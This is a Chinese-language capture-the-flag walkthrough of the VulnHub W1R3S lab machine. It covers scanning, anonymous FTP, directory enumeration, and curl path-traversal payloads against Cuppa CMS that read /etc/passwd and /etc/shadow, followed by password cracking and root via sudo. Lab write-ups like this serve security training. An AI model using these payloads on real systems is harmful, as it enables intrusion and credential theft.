vulnhub-w1r3s-editable通关教程
扫描网段存活主机
Nmap -sP 192.168.135.0/24

扫描靶机开放端口
Nmap 192.168.135.139

我们在全扫描时发现有默认登录,我们登录ftp,账号密码Anonymous allowed
Nmap -sS -sV -A -p- -T5 192.168.135.139
ftp 192.168.135.139
ls

我们看到有三个文件,访问content,并执行binary,传文件时不会损坏
Binary
Cd content

有三个txt文件,将其全部下载
Mget *.txt

一个一个查看内容
Cat 01.txt

我们发现02是两段加密,第一条是32位的16进制加密(MD5),第二段估计是(base64)我也看不出,但是有===就是base64

第三个是艺术图片没什么信息
Cat 03.txt

我们接着看看80端口发现没有什么可执行的页面

我们直接遍历这个网站的目录
Dirb http://192.168.135.139


刚拉下来就看到了administrator目录,登录后发现下载需要管理员权限,我们看看它的指纹信息
Whatweb http://192.168.135.139/administrator/installation/

成功识别出是cuppacms管理系统,我们看看有没有exp能用
这里有两个方法一是网上搜索cuppacms exploit,直接到漏洞库找,下载到kali机上,二是直接在kali上看看有没有该漏洞
Searchsploit cuppa cms

很幸运,我们看看它的具体位置
Searchsploit -p 25971.txt

尝试里面的payload有没有用,发现可以返回信息
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.135.139/administrator/alerts/alertConfigField.php

构造payload,查看shadow里的信息,Linux里的用户加密信息放在shadow路径下
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.135.139/administrator/alerts/alertConfigField.php

我们发现了三段包含用户名和密码的加密信息,把他们加入文本,破解他们
John yang.txt





登录该用户的ssh,发现它可以执行sudo su

直接完结撒花

浙公网安备 33010602011771号